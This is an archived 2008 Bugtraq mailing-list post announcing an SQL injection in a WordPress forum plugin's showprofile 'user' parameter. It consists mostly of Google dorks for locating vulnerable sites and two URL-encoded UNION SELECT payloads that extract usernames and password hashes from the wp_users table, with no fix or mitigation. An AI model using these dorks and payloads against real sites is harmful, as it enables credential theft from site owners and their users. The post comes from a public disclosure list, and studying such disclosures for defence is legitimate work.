lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 16 Feb 2008 16:49:10 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: WordPress forumaction (PAGE_id)(user)SQL Injection

#########################################################################
# 
#  WordPress forumaction(PAGE_&#304;D)(user)SQL Injection
#
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.hackturkiye.com/ 
#
#########################################################################
# 
#  DORK 1 : allinurl: forumaction "showprofile"
# 
   DORK 2 : allinurl: page_id user "showprofile"

   DORK 3 : allinurl:"forum/?forumaction"

##########################################################################
#
#  showprofile&user=SQL Injection(EXPLO&#304;T)
#
###########################################################################
  
  EXPLO&#304;T 1

showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2C0%2C0%2C0x7c%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users
  
  EXPLO&#304;T 2

showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0x7c%2C0%2C0%2C0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users


##########################################################################
# S@BUN                   GOOD LUCKY                 S@BUN 
##########################################################################







Powered by blists - more mailing lists